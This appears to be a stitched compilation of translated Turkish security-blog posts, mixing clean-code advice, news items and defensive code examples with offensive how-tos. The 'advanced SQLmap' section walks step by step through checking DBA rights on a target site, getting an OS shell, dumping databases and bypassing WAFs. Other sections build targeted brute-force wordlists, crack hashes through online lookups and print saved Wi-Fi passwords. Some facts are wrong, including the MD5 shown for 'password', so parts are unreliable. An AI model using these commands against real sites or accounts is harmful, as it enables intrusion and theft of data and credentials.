About Clean Code – Bug and Security


One of the components of the smooth operation of any application (in addition to stable servers, load balancing, and more) is clean code. However, is clean code possible in real life, or is it just a programmer’s dream? Where do vulnerabilities come from and how to avoid bugs?

Each programming language is designed with a different operating system, platform, coding style, and intended use in mind. We usually hear about the languages Python, PHP, Ruby, JavaScript, Java, C, C++ and C#, as well as more modern flavors such as Rust, Swift, Hack, and many others.

“Programming is the art of communicating to another person what he wants from a computer.” Donald Knuth

What is Clean Code?

When we talk about clean code, we picture perfectly thought-out lines: code that was planned out before it was written, so well planned that it works flawlessly on the first run.

However, real programming is much more difficult:

No matter what you do, mistakes are hard to avoid. Doubt about your own competence keeps growing, and a mistake you thought would take five minutes to fix ends up taking hours. On top of that, the feature you were about to implement has turned into a major problem for the project.

In this case, it is important to keep in mind that it is impossible to write perfect code right away. It requires many hours of deliberation and detailed planning. Here, everyone decides for themselves what takes priority: writing clean code or speed of work.

Code Objectivity

Clean code is objectively good code. It is written as succinctly and elegantly as possible, without duplication. It is structured to be easy to read by both humans and computers. Anyone can write computer-readable code, but only a good programmer can write human-readable code.

Sloppy code is expensive, time-consuming and laborious to maintain. In addition, such code is more prone to errors that can cause the program to crash.

It should be understood that clean code is a product of collaboration, where everyone on the team needs to understand the code. This optimizes work in the event of a change in the composition of the team and greatly simplifies refactoring and debugging.

Basic concepts

Refactoring is the process of optimizing a program code without changing its external behavior in order to improve performance, readability, testability, or maintainability. Basically, with refactoring, you improve the design of the code after it has been written.

Debugging is fixing bugs in your code.

However, even clean code has an expiration date. Software and computing exist in a rapidly changing landscape. Code that used to be clean is deprecated.

Deprecated code is code that is not maintained or updated, but is used. It works or not, and no one understands why. The older the code in your codebase, the harder it is to understand, no matter how well written it is.

As a result, while the codebase may be clean from the outset, the need to scale, change, and new requirements can lead to contamination.

Criteria by which the code can be considered clean:

No code redundancy
The code must comply with the DRY (Don’t repeat yourself) rule. This means that any change in one area should not require changes in others.

Minimum dependencies
If your code has many dependencies, it is more difficult to maintain or change in the future.

Minimum extensions
The code should contain a minimum number of both classes (templates for creating objects that provide initial values for state) and methods (functions or procedures belonging to a particular class or object).

Functionality and code readability
The code should be simple, convenient and understandable so that any developer can quickly read it. To do this, many developers use the KISS (keep it simple and straightforward) and YAGNI (You aren’t gonna need it) rules.

Code analysis
Use language static analysis tools to inspect your code.

Code quality and safety
The high quality of the software does not in itself imply that the software is secure. The absence of vulnerabilities in the code is still not a mandatory requirement for most development companies.

Why is security fading into the background?
In the development world today, functionality and speed outweigh safety. Enterprises cannot stay ahead of the competition without creating and releasing new features in a short time frame.

Security is not a competitive differentiator: Consumers don’t think about security when using an app or buying a smart device, be it a smart thermostat or a light bulb. Recall an incident from 2020 when a drone was able to hack smart light bulbs

Using Advanced SQLmap


What is SQLmap?

SQLmap is a very useful SQL injection tool developed in the Python language. Basically, it scans the target website by trying combinations of SQL payloads against the parameters you specify.

So what are the advantages of SQLmap? :

Given just a few parameters, it can test the target faster than you could by hand, running dozens of checks and storing the results it finds. Depending on the permissions of the current user on the database server, it can also enumerate other database names and the like, and, with the commands you give it, obtain a shell on the server.
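SQLmap only finds what an application already exposes. As an added illustration (not code from the original post or from the sqlmap project), here is the defect it looks for in its smallest form, next to the fix that removes it. The table, rows and the `lookup_*` function names are constructed for this example; the database is an in-memory SQLite instance.

```python
# Added example (not from the original post or the sqlmap project): the defect
# sqlmap looks for, in its smallest form, beside the fix. Uses an in-memory
# SQLite database with constructed sample rows.
import sqlite3

# Constructed sample data: two users, one of them an administrator.
SAMPLE_USERS = [
    (1, "alice", "alice@example.invalid", 0),
    (2, "admin", "admin@example.invalid", 1),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, name):
    # String concatenation: whatever the client sends becomes part of the SQL text,
    # which is exactly the condition sqlmap's payloads probe for.
    query = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn, name):
    # Parameter binding: the value travels separately from the SQL text, so the
    # database treats it as data, never as syntax.
    query = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


def demo():
    conn = make_db()
    # A tautology in the input: harmless for the hardened query, row-leaking for the other.
    tainted = "nobody' OR '1'='1"
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "alice"),
        "normal_hardened": lookup_hardened(conn, "alice"),
        "tainted_vulnerable": lookup_vulnerable(conn, tainted),
        "tainted_hardened": lookup_hardened(conn, tainted),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:<20} -> {rows}")
```

Running the script shows both functions returning the same row for a normal name, while the concatenating version returns every user for the tainted input and the bound version returns nothing. The fix is the binding, not input filtering: the `--tamper` options later in this post exist precisely because filters can be evaded, whereas a bound parameter cannot become SQL.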

How to Install SQLmap? :

In Windows Operating Systems;

First of all, in order to run it, you need to install Python on your system; download and install it from here. After that, download SQLmap from GitHub; you can download it from here. After installing the necessary files from the links I have given, you can start using SQLmap without any problems.

In Linux Operating Systems

In operating systems built for penetration testing, such as Kali Linux, it comes pre-installed. On other Linux operating systems, if you already have Git installed:

  • git clone https://github.com/sqlmapproject/sqlmap.git

If Git is not installed yet, you need to install it before running this command.

In Mac OS Operating System

According to the statistics I’ve seen, I show you how to install it on Mac OS, as there are too many Mac OS users visiting our website 🙂

Firstly;

  • ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2> /dev/null

Install Homebrew with this command.

Then you can install SQL map on your system using this command.

SQLmap Usage:

Now that we have done everything necessary to use it, we can move on to advanced SQL map use.

I start with the command that checks whether you have write permission on the target site. If you have write permission, you can get a shell on the site using SQLmap.

  • sqlmap -u "target_url" -o -b --current-user --is-dba

As seen in the picture, when you get the output “current user is DBA: True”, it means you have write permission. If it says “False” where it says “True”, it means there is no authorization.

If it has write permission, that is, if it outputs “True”, you can enter the shell command.

  • sqlmap -u "target_url" -o -b --os-shell

After you enter the command, SQLmap reports the directory to which it uploaded the shell. Of course, it does not always have something to report: there may be a security system on the site, or errors caused by something else.

Now Pulling Database of Web-Site from Explicit URL:

Enter this command using the --dbs parameter to display the names of the site's databases.

  • sqlmap -u "target_url" --dbs

After viewing the database names, enter this command using the --tables parameter to view the table names in the database.

  • sqlmap -u "target_url" -D database_name --tables

After viewing the tables in the database, enter this command using the --columns parameter to display the columns of the selected table.

  • sqlmap -u "target_url" -D database_name -T table_name --columns

After viewing the columns, you can pull the contents of the desired column using the --dump parameter with this command.

  • sqlmap -u "target_url" -D database_name -T table_name -C column_name --dump

All captured data will be saved in the file path that SQLmap reports.

Waf Bypass Parameter:

Waf stands for web application security panel. SQLmap can perform WAF bypass operations for you automatically by using tamper parameters. Enter the following command for SQLmap WAF bypass.

  • sqlmap -u "target_url" --dbs --tamper=space2comment

Batch Parameter:

SQLmap asks the user questions during its operations, for example "A payload was found, continue the test?". This parameter lets SQLmap do everything automatically without asking the user any questions.

  • sqlmap -u "target_url" --dbs --batch

Random-Agent Parameter:

With this parameter, SQLmap uses the user agents stored in its own files when sending payloads to the target website.

  • sqlmap -u "target_url" --dbs --random-agent

Level and Risk Parameters:

When you apply these parameters, SQLmap will try more payloads against the database; of course, this naturally slows SQLmap down.

  • sqlmap -u "target_url" --dbs --level=5 --risk=3

You can change the level and risk values given here yourself: the --level value ranges between 1 and 5, and the --risk value between 1 and 3.

Finally, you can combine the parameters above according to the situation. For example:

  • sqlmap -u "target_url" -D database_name -T table_name -C column_name --dump --tamper=space2comment --batch --random-agent --level=5 --risk=3

The parameters I gave above are the most important ones.

You can view all parameters using this command. If you have any questions, you can reach me from my social media accounts or specify them in the comments section.
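Each of the options above leaves a trace in the web server's access log, and that is where a site owner can see a scan as it happens. The detector below is an added example (not from the original post or the sqlmap project): it runs three rules over constructed, simplified log lines (method, path, status, user agent). The rules rest on two facts about the options discussed here: sqlmap's default User-Agent string starts with `sqlmap/`, and the `space2comment` tamper replaces spaces in the payload with `/**/`. The log lines, the `RULES` list and the function names are constructed for this example.

```python
# Added example (not from the original post or the sqlmap project): a small
# detector for the traces the options above leave in a web server access log.
# Log lines are constructed for this example; the format is a simplified
# combined log (method, path, status, user agent).
import re
from urllib.parse import unquote

# Constructed sample log lines.
SAMPLE_LOG = """\
GET /product.php?id=12 200 "Mozilla/5.0 (Windows NT 10.0) Firefox/115.0"
GET /product.php?id=12%20AND%201=1 200 "sqlmap/1.7.2#stable (https://sqlmap.org)"
GET /product.php?id=12/**/AND/**/1=1 200 "Mozilla/5.0 (Windows NT 10.0) Firefox/115.0"
GET /product.php?id=12%27%20AND%20SLEEP(5)--%20- 200 "Mozilla/5.0 (X11; Linux x86_64) Chrome/118.0"
GET /about.html 200 "Mozilla/5.0 (Macintosh) Safari/605.1"
"""

LINE_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$')

# Each rule is tied to one sqlmap option discussed above (constructed list).
RULES = [
    # the default User-Agent, which --random-agent is designed to replace
    ("default-user-agent", lambda path, ua: ua.startswith("sqlmap/")),
    # space2comment turns spaces into /**/, which normal query strings never contain
    ("space2comment-tamper", lambda path, ua: "/**/" in path),
    # boolean (AND 1=1) or time-based (SLEEP) probe fragments in the decoded query,
    # evaluated after undoing the /**/ substitution so the tamper does not hide them
    ("sql-probe", lambda path, ua: re.search(
        r"\b(AND|OR)\b\s*\d+=\d+|\bSLEEP\(", path.replace("/**/", " "), re.I) is not None),
]


def classify(line):
    """Parse one log line and return its decoded path, user agent and rule hits."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = unquote(m.group("path"))  # decode %20, %27 and friends before matching
    ua = m.group("ua")
    hits = [name for name, check in RULES if check(path, ua)]
    return {"path": path, "ua": ua, "hits": hits}


def scan(log_text):
    """Return only the lines that triggered at least one rule, in log order."""
    results = []
    for line in log_text.splitlines():
        c = classify(line)
        if c and c["hits"]:
            results.append(c)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(", ".join(r["hits"]), "->", r["path"], "|", r["ua"])
```

The first rule is the weakest one: `--random-agent` removes the `sqlmap/` string, which is why the other two look at the request itself rather than at who claims to be sending it. Decoding the path before matching matters as well, since the third sample line only reveals `' AND SLEEP(5)` once `%27` and `%20` are unescaped.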

Social Media Disasters

What is Social Media Disaster:

A social media disaster is when a brand or a well-known person is somehow humiliated by using social media, damaging its image and revealing things that not everyone should know. In this article, we have compiled the Social Media Disasters that have befallen major brands around the world.

McDonald’s

A foreign substance was found in a hamburger taken from a McDonald’s restaurant in Temuco, 700 km south of Chile’s capital, Santiago. After the customer claimed that the foreign substance was the tail of a mouse through his social media networks, the food health authorities started an investigation and it was confirmed that the substance was the tail of a mouse. Thereupon, the restaurant was closed and the incident exploded on social media networks. After this social media disaster, McDonald’s sales, especially in Chile, decreased drastically.

BlackBerry

As the Canada-based technology company BlackBerry tries everything to regain the popularity it once enjoyed, a great misfortune has befallen it. BlackBerry, which shared the new BlackBerry Classic model on its official Twitter account, posted it from an iPhone, although Twitter is specific to their phones.

Burger King

Someone working at Burger King took a picture of himself stepping on the lettuce boxes and shared it on social media platforms. Later, this image started to be shared on news sites with the headline "The lettuce you ate at Burger King". Thereupon, Burger King officials extracted the GPS data from the photo, determined where it was taken, and fired the employee. However, even though the matter was handled internally, Burger King's brand image was damaged as a result of this social media disaster.

American Red Cross

Gloria Huang, Twitter administrator of the American Red Cross, America's Red Crescent, accidentally posted a tweet she meant to publish from her own account from the brand account instead. The message read, "My friend Ryan just found two more of a four-pack of Dogfish Head beer. If we drink, we will drink like men." Moreover, the message was deleted only an hour after it was posted on the brand account. Huang later explained that it was due to her misuse of the program she used for Twitter from her own account, and apologized. Later, the American Red Cross sent an urgent message from its own account announcing that they had deleted this tweet and that the Red Cross is definitely not an alcoholic and continues to work seriously. Thus, they apologized to their followers with a slightly humorous message.

Cybercriminals Are Targeting Elders

During the Pandemic Period, Our Elders Are the Target of Cyber Criminals.


The period of staying at home during the pandemic lasted a long time for the elderly. The increasing use of technology by this age group has opened a new door of opportunity for cybercriminals. Cyber security professionals issue warnings and suggestions, stating that the elderly should not be left alone against the increasing attacks.

With the prolongation of the stay at home, there has been a significant increase in the number of our elders on social media platforms. The use of technology has increased in our elders as in everyone else. More video chats are preferred. Meeting applications such as Zoom have been instrumental in bringing together distant acquaintances.

With this process, an increase in financial fraud and hacking incidents has begun to be observed in the older age group, where digital literacy is lower. Cybersecurity experts noted a significant lack of awareness among older adults. Seniors are not very aware of the dangers they may face on the Internet from criminals trying to obtain their personal or financial information. Their awareness of protecting their personal data against fake bank e-mails and phishing e-mails disguised as bills from GSM operators is quite low.

We should help our elders in this regard and raise their awareness as much as we can. During the pandemic period, we should understand our elders, who are especially targeted, and give them information about cyber security.

How Do Antivirus Programs Work?

What is Antivirus Program? :

Antivirus Programs are the main programs to be installed after the Operating System is installed on a computer. The main purpose of the antivirus program is to prevent all kinds of malicious software that can harm your computer or steal your personal information. These malicious software can infect your computer over the network, with any USB memory stick you insert into your system, or with a file you download from the internet.

How to Use Antivirus Programs? :

Care should be taken when choosing antivirus programs, because they have a great deal of authority on your system, and reliable software such as Kaspersky and Eset should be used. At the same time, cracked software should be avoided, because such software modifies the main program so that it no longer receives updates, which leaves you vulnerable to the new threats that come out every day, and many cracks can even damage the system. We, as www.siberguvenlikblogu.com, recommend using free versions or free trial versions of antivirus programs instead of cracked software.

What are the Working Principles of Antivirus Programs? :

Antivirus is the firewall at the main exit points of your computer. It analyzes whether a file entering your computer poses a risk to your system, either by connecting to servers to examine it or by scanning it against the signature database it downloads in compressed packages, and takes action according to your settings for the security of your system.
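The "database it downloads" deserves a concrete picture, because it explains why updates matter. The script below is an added example (not the original post's code and not how any named vendor's product is implemented): a toy scanner with the two kinds of lookup a signature database holds, whole-file hashes and byte patterns, run over three constructed samples. The sample bytes, signature names and the `scan_*` function names are all constructed for this example.

```python
# Added example (not from the original post or any antivirus vendor): a toy
# signature scanner showing the two lookups the text describes, a whole-file
# hash database and byte-pattern signatures, on constructed sample files.
import hashlib

# Constructed "known bad" samples. In a real product these come from the vendor's
# downloaded signature packages; here they are just byte strings.
KNOWN_BAD_FILE = b"MZ...fake dropper...CONNECT evil.example.invalid:4444..."
# The same sample with one byte changed, as a repacked variant would be.
VARIANT_FILE = KNOWN_BAD_FILE.replace(b"4444", b"4445")
CLEAN_FILE = b"Just a text file with nothing suspicious in it."

# Signature database (constructed): full-file SHA-256 hashes and byte patterns.
HASH_SIGNATURES = {hashlib.sha256(KNOWN_BAD_FILE).hexdigest(): "Dropper.Fake.A"}
PATTERN_SIGNATURES = [(b"CONNECT evil.example.invalid", "Dropper.Fake.gen")]


def scan_bytes(data):
    """Return (verdict, reason) for a file's contents."""
    # Exact match first: cheapest check, but it only catches byte-identical files.
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        return ("malicious", "hash:" + HASH_SIGNATURES[digest])
    # Pattern match second: survives small changes to the file, at a higher scan cost.
    for pattern, name in PATTERN_SIGNATURES:
        if pattern in data:
            return ("malicious", "pattern:" + name)
    return ("clean", "")


def scan_all():
    """Scan the three constructed samples and return their verdicts by name."""
    return {
        "known": scan_bytes(KNOWN_BAD_FILE),
        "variant": scan_bytes(VARIANT_FILE),
        "clean": scan_bytes(CLEAN_FILE),
    }


if __name__ == "__main__":
    for name, (verdict, reason) in scan_all().items():
        print(f"{name:<8} {verdict:<10} {reason}")
```

The one-byte variant slips past the hash signature and is only caught by the pattern; a variant that also changed the pattern would be caught by neither until the vendor ships a new signature package. That gap is what the cracked copies described above, which block updates, leave permanently open.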

Making the Computer Safer

For you, our valued visitors, we have compiled the things you can do to make your systems more secure:

No matter how hard you try to protect your system, you always leave doors open. What matters is how few doors you leave open.

We have prepared an article for what needs to be done to have a more secure system. By following these simple rules, you can prevent your data from falling into unwanted hands and other undesirable situations.

Use Antivirus Programs

It is very important to use antivirus software for the security of your system and network. It provides high-level protection for you. You can use antivirus software of some big companies. You can find the article about the working principles and logic of Antivirus Programs here.

Checking Ports

Many attacks can be prevented with Windows Firewall. But some programs open ports in the firewall in order to be able to update. Every port opened this way is another way into our computer. It is useful to take a look at which programs are allowed through in the Firewall section of the Control Panel. Apart from the programs we have installed ourselves and are sure of, we should remove the entries that appear here and that we do not recognize.

Pay Attention to the Sites You Login to

While navigating various web pages, we may need to enter our personal passwords. When we do, the browser we use offers to remember the username and password so that it fills them in automatically next time. We should not forget that such automatic remembering means writing our username and password down somewhere on our computer. People who attack our computer for malicious purposes can find them and hijack our accounts. Therefore, although it may seem practical, it is better to stay away from such automatic remembering and enter our username and password manually as much as possible.

Pay Attention to Incoming Mails

All the measures we take are generally meant to stop attacks from outside; in general, they do not aim to stop the actions of an active user. For this reason, if we open an e-mail from a person we do not know and run the program in it, the measures we take will be in vain. The easiest way to avoid this is to delete e-mails from people we do not know without opening them. Many e-mail clients and webmail pages have precautions against such incoming spam; it would be useful to activate them.

Keep Your System Up-to-Date

The best way to close many vulnerabilities is to install updates that companies make for their programs. Thanks to these updates, almost all the vulnerabilities found in the programs are closed. It is one of the best solutions to check the updates of the programs installed on our computer, even once a week, or to activate automatic updates if the program has support.

How to Learn Wifi Passwords with Python?

Python: It is a high-level programming language, written with simple syntax based on indentation. This programming language is very easy to learn and remember compared to other programming languages. The Django and Zope application servers, YouTube and the original BitTorrent client are some of the important projects created using Python. Large institutions such as Google, NASA and CERN also use Python. In the future, articles about this programming language that we love to use will continue to come; stay tuned.

Now, let's come to our code: using the "subprocess" library, you will be able to view the names and passwords of all the Wi-Fi networks previously connected to on the system. If you wish, you can show this program to your relatives and look like you are hacking the Wi-Fi; that is of course the fun of the job 🙂

Here is our Code:


print("""Wifi Görüntüleyici

-www.siberguvenlikblogu.com-
""")

import subprocess
import time


def saved_profiles():
    # 'netsh wlan show profiles' lists the Wi-Fi profiles saved on Windows; the
    # names appear on lines such as "    All User Profile     : HomeNet".
    # netsh output is not always UTF-8 on localized systems, so undecodable
    # bytes are ignored instead of crashing the script.
    veri = subprocess.check_output(
        ['netsh', 'wlan', 'show', 'profiles']).decode('utf-8', errors='ignore').splitlines()
    return [i.split(":", 1)[1].strip() for i in veri if "All User Profile" in i]


def profile_key(name):
    # 'key=clear' makes netsh print the stored passphrase on a "Key Content" line;
    # open networks have no such line, so an empty string is returned for them.
    sonuc = subprocess.check_output(
        ['netsh', 'wlan', 'show', 'profile', name, 'key=clear']).decode('utf-8', errors='ignore').splitlines()
    sifreler = [b.split(":", 1)[1].strip() for b in sonuc if "Key Content" in b]
    return sifreler[0] if sifreler else ""


def analiz():
    # Print every saved profile together with its stored key.
    print("Sistem analiz ediliyor")
    time.sleep(1)
    print("Bulunan Wifiler: ")
    for i in saved_profiles():
        print(" {:<30}| Şifre: {:<}".format(i, profile_key(i)))


while True:
    analiz()
    try:
        exe = int(input("\n\n\n1'e basarak yeniden sistemi analiz edebilirsiniz\n2'ye basarak çıkış yapabilirsiniz "))
    except ValueError:
        exe = 0  # non-numeric input falls through to the error message below
    if exe == 1:
        print("")
        time.sleep(1)
    elif exe == 2:
        print("")
        time.sleep(1)
        break
    else:
        print("Bir hata yaptınız lütfen tekrar deneyin")

Hackers Stole Data of 26 Million Users!

It turned out that the user data of dozens of companies, including giants such as Facebook, Apple, Netflix and Instagram, was stolen for 2 years!


It has been announced that hackers have seized 26 million user login information of many important companies, including giant names such as Amazon, Apple and Facebook, between 2018 and 2020. Credit card information used to make payments from 3.25 million Windows computers was also reportedly stolen, as a result of a new malware disclosed by security company NordLocker. 1.2 terabytes of data filled with stolen information are fragmented and offered for sale on the Deep Web. Other companies whose accounts were targeted include eBay, Instagram, Netflix, Paypal, Roblox, Steam, Twitch and Twitter.

As a result of cyber attacks carried out with a new RAT, namely a "remote access trojan", the social media accounts and credit card information of many users were stolen. Cybersecurity experts are worried that the toll of this malware, which antivirus programs cannot detect, may be heavier than it seems. The new malware, detected as a result of the files examined by the cybersecurity company NordLocker, affects Windows systems.

Creating a Custom Wordlist for Brute Force

What is a Wordlist: It is a word (password) list created from many word and password combinations. It is used in the Brute Force attack, also mentioned in this article, to log into the target system or a user's private system. Some versions may consist of millions of words (passwords).

After this article, you will be able to create a personalized Wordlist, that is, a Wordlist created using what we know about the target, for Brute Force attacks, without needing long Wordlists for the person's password.

At the same time, in order to protect you and your relatives from this attack, I will give you an open-source Python program, which we have written in line with the purpose of our website siberguvenlikblogu.com, that generates passwords with characters that are very hard to crack by Brute Force attacks.

Now Let's Come to the Custom Wordlist Creation Program cupp.py:

This program creates a Wordlist using known information about the target system or person. Thus, considering that most people today use publicly known personal information in their passwords, the probability of finding the target's password in Brute Force attacks increases significantly.

I will show you how to use our program on Kali Linux, which is designed for cyber security. You can use it on different operating systems if you wish:

First, download our tool with the "git clone" command;

git clone https://github.com/Mebus/cupp.git

Then run our tool from the directory it was downloaded to.

On the screen that comes up, the program shows us the parameters, we will use the “-i” parameter;

python3 cupp.py -i

With this parameter, the tool will ask us for information about the target;

Take care to enter as much as you can; then it asks what can be added optionally. My suggestion is to choose the options as seen in the screenshot, but again, the last part is for adding completely optional extra numbers or special characters. By the way, be careful not to use Turkish characters, because there are no Turkish characters in passwords 🙂

Now, a Tool for Complete Protection from This Attack

As I mentioned at the beginning, you will be able to generate completely random high-security passwords with the help of this admin-safe tool.

Our vehicle;

To use this tool written in Python language, the “colorama” library must be installed on your system.

You can install it with the command and you can use the application easily.
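The blog's own generator is not reproduced on this page, so here is an added example of the same idea (my code, not the blog's tool): a generator built on Python's `secrets` module, which draws from the operating system's cryptographic random source, together with a check that every character class is present and an estimate of the search space a brute-force attack would have to cover. The function names `generate_password`, `has_all_classes` and `entropy_bits` are constructed for this example; it needs no third-party library.

```python
# Added example (not the blog's own tool, which is not reproduced on this page):
# a generator for random passwords using the secrets module, with a check that
# every character class is present and an estimate of the search space a
# brute-force attack would face.
import math
import secrets
import string

CLASSES = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string.punctuation]
ALPHABET = "".join(CLASSES)  # 94 printable ASCII characters


def has_all_classes(password):
    """True when the password contains at least one character from every class."""
    return all(any(ch in cls for ch in password) for cls in CLASSES)


def generate_password(length=16):
    """Return a uniformly random password of the given length containing every class.

    secrets.choice is used rather than random.choice: the latter is seeded from
    predictable state and must never be used for secrets.
    """
    if length < len(CLASSES):
        raise ValueError("length must be at least %d" % len(CLASSES))
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        # Rejection sampling keeps the distribution uniform over the accepted set,
        # unlike "pick one from each class, then shuffle", which biases positions.
        if has_all_classes(candidate):
            return candidate


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Bits of entropy of a uniformly random string: log2(alphabet_size ** length)."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    pw = generate_password(20)
    print(pw)
    print("entropy ~ %.1f bits" % entropy_bits(len(pw)))
```

A 16-character password from this alphabet carries roughly 105 bits, which no wordlist, personalized or not, can cover: the cupp approach above works only against passwords assembled from facts about their owner, and a generated password contains none.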

Decode Any Kind of Hash with Python

What is a Hash: The password entered when registering for a site is automatically converted into a seemingly random set of characters called a "hash" before it goes into the database. For example, when the password "password" is hashed with the MD5 method, we obtain "8cdee5526476b101869401a37c03e379", the encrypted form of this password. The password is saved in hashed form in the site's database. When you want to log in to the site, the password you type is converted to a hash by the system and compared with the hash in the database. If the hashes match, the login succeeds.

Hashes are impossible to crack, but hashes of passwords that have been seen before can be found by saving them in a decryption database and matching against it. To keep your passwords secure, you must set a password that is not used by everyone. That way, even if the site you log into is hacked, your passwords will not be accessible. However, the "password" password we gave as an example in this text has been saved in databases before and is known, so we can decrypt its hash.
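The lookup described above works because an unsalted MD5 of a given password is always the same string, so one recorded match answers for every site that stored it. The script below is an added example (not the original post's code and not the linked tool): it builds a tiny lookup table of the kind the post refers to, shows it answering for "password", and then stores the same password with a per-user random salt and PBKDF2 from Python's standard `hashlib`, which produces a different digest each time and so has nothing for a table to match. The table contents and the function names are constructed for this example.

```python
# Added example (not from the original post or the linked tool): why a lookup
# database works against plain MD5 and fails against salted, slow hashing. The
# "database" of previously seen hashes is constructed for this example.
import hashlib
import secrets

# Constructed lookup table: MD5 digests of a few common passwords.
LOOKUP_DB = {hashlib.md5(p.encode()).hexdigest(): p for p in ["password", "123456", "qwerty"]}


def md5_hex(password):
    """Plain, unsalted MD5 as the post describes: same input, same digest, everywhere."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup(md5_digest):
    """Return the password if the digest was recorded before, else None."""
    return LOOKUP_DB.get(md5_digest)


def pbkdf2_hash(password, salt=None, iterations=200_000):
    """Store a password as salt$iterations$digest using PBKDF2-HMAC-SHA256.

    A fresh random salt per user makes equal passwords produce different
    digests, so a precomputed table cannot match them; the iteration count
    makes each guess slow.
    """
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + str(iterations) + "$" + digest.hex()


def pbkdf2_verify(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, iters, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return secrets.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    h = md5_hex("password")
    print("md5(password) =", h, "-> lookup:", lookup(h))
    a, b = pbkdf2_hash("password"), pbkdf2_hash("password")
    print("same password stored twice, different values:", a != b)
    print("verify correct / wrong:", pbkdf2_verify("password", a), pbkdf2_verify("wrong", a))
```

The salt is stored in the clear next to the digest; it is not a secret, its job is only to make every stored hash unique. That is enough to defeat the shared lookup databases the post relies on, and the iteration count is what makes guessing each candidate on its own expensive.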

How to Decrypt Hashes Saved to Databases:

Now let's come to our main topic. I said that hashes can never be solved, so how can you decode any hash with Python? As I said, millions of hashes have been recorded in decryption databases so far. The tool I wrote, which I will give you, automatically looks up the hash you enter on all the online hash decoding sites, so you can decode almost any previously recorded hash.

This tool automatically scans the Hash you entered on the best decryption sites on the market, giving you results found.

The parameter that is sufficient for you is "-s"; the other parameters can be understood and used by those who are a bit more advanced in software.

Libraries required to use this tool

argparse
concurrent.futures

The command required to use this tool for its most basic purpose is;

python3 tool.py -s cozulecek_hash

https://github.com/emyounoone/hash-cracker

You can download and start using it here.

Universities Under Intense Cyber Attack


Turkish Government Sites, Universities and Company Sites Under Intense Cyber Attack

Recently, Turkish websites have been under intense cyber attack. These attacks include leaking data and "indexing" the site (unauthorized modification of the site's home page). In recent months, there have been intense cyber attacks on the sites and systems of Turkish companies, large and small. Likewise, subdomains of Çukurova University, Necmettin Erbakan University, Recep Tayyip Erdoğan University and Iğdır University were hacked by a group of hackers using the code names "GaskmanTR, Xale, Yuba, Mutarrif, RootSploiX".

In the pictures and messages posted on the websites of the universities whose subdomains were hacked, there were words against the increase in violence against women and child rape. We hope that measures against hacking incidents, which have increased especially against state universities in recent months, will be tightened even further.

You can access the Attack Records from these links:

Çukurova University: https://mirror-h.org/zone/2904064/

Necmettin Erbakan University: https://mirror-h.org/zone/2902508/

Recep Tayyip Erdogan University: https://mirror-h.org/zone/2902566/

Iğdır University: https://mirror-h.org/zone/2900777/
